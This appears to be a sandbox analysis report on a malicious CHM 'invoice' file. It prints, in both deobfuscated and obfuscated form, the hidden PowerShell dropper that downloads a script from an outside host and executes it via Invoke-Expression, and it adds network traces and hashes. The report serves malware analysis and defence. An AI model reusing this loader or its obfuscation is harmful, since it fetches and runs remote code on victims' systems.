Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    43s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    18/10/2022, 21:35 UTC

General

  • Target

    RECHNUNG.chm

  • Size

    14KB

  • MD5

    498b61349a8668cae80d468b348abb9d

  • SHA1

    603d0fdba865ad02eef0c96462be6d97d431e7ac

  • SHA256

    e268f2982e14d363e7f7874696d231701234d4b426c3a1bef7271cc0bf766706

  • SHA512

    e4281b3210518e2ea965e5d63a070f2eec89ea1d37b9c0d9d65023ec457570b30ab4092e888e75f53797a33143e5bbcdf8ec2845d3176f8bfae02674e126665f

  • SSDEEP

    192:Nco/1QY0OXlb3iQbZaEaJT5cC+aRWTwY2TZhYj1HhIUb:Ncodln53HZ/aLWa0MY21YIc

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
$t0 = "IEx"
3
set-alias p "IEx"
4
"Continue" = "SilentlyContinue"
5
$t56fg =
6
(toobject, [system.net.securityprotocoltype], 3072)
7
[system.net.servicepointmanager]::securityprotocol = $t56fg
8
"[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')"|invoke-expression
9
({$ping = test-connection -comp google.com -count 1 -quiet "", $tty = "(New-Object Net.WebClient)"|invoke-expression, $mv = $tty.downloadstring("https://meyeks.com.tr/hala.txt")|invoke-expression})
10
11
# powershell snippet 1
12
[void][system.reflection.assembly]::loadwithpartialname("Microsoft.VisualBasic")
13
14
# powershell snippet 2
15
new-object net.webclient
16
URLs
ps1.dropper

https://meyeks.com.tr/hala.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\RECHNUNG.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://meyeks.com.tr/hala.txt')|P
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1440

Network

  • flag-us
    DNS
    google.com
    Remote address:
    8.8.8.8:53
    Request
    google.com
    IN A
    Response
    google.com
    IN A
    142.250.179.142
  • flag-us
    DNS
    meyeks.com.tr
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    meyeks.com.tr
    IN A
    Response
    meyeks.com.tr
    IN A
    31.210.74.154
  • flag-tr
    GET
    https://meyeks.com.tr/hala.txt
    powershell.exe
    Remote address:
    31.210.74.154:443
    Request
    GET /hala.txt HTTP/1.1
    Host: meyeks.com.tr
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
    Pragma: no-cache
    Content-Type: text/html
    Content-Length: 1148
    Date: Tue, 18 Oct 2022 21:35:55 GMT
    Server: LiteSpeed
    Alt-Svc: quic=":443"; ma=2592000; v="35,39,43,44"
    Connection: Keep-Alive
  • 31.210.74.154:443
    https://meyeks.com.tr/hala.txt
    tls, http
    powershell.exe
    708 B
    5.2kB
    8
    8

    HTTP Request

    GET https://meyeks.com.tr/hala.txt

    HTTP Response

    404
  • 8.8.8.8:53
    google.com
    dns
    56 B
    72 B
    1
    1

    DNS Request

    google.com

    DNS Response

    142.250.179.142

  • 8.8.8.8:53
    meyeks.com.tr
    dns
    powershell.exe
    59 B
    75 B
    1
    1

    DNS Request

    meyeks.com.tr

    DNS Response

    31.210.74.154

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1048-54-0x000007FEFC281000-0x000007FEFC283000-memory.dmp

    Filesize

    8KB

  • memory/1440-58-0x000007FEEDAC0000-0x000007FEEE61D000-memory.dmp

    Filesize

    11.4MB

  • memory/1440-59-0x000000001B720000-0x000000001BA1F000-memory.dmp

    Filesize

    3.0MB

  • memory/1440-60-0x00000000023B4000-0x00000000023B7000-memory.dmp

    Filesize

    12KB

  • memory/1440-61-0x00000000023BB000-0x00000000023DA000-memory.dmp

    Filesize

    124KB

  • memory/1440-62-0x00000000023B4000-0x00000000023B7000-memory.dmp

    Filesize

    12KB

  • memory/1440-63-0x00000000023BB000-0x00000000023DA000-memory.dmp

    Filesize

    124KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.